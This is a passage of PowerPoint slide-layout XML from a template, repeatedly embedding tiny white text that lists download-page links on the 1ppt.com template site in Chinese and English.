              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout135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35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35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35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35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35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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout135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35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35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35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3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36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36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36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36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36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36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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout136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36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36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36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3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37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37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37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37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37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37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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
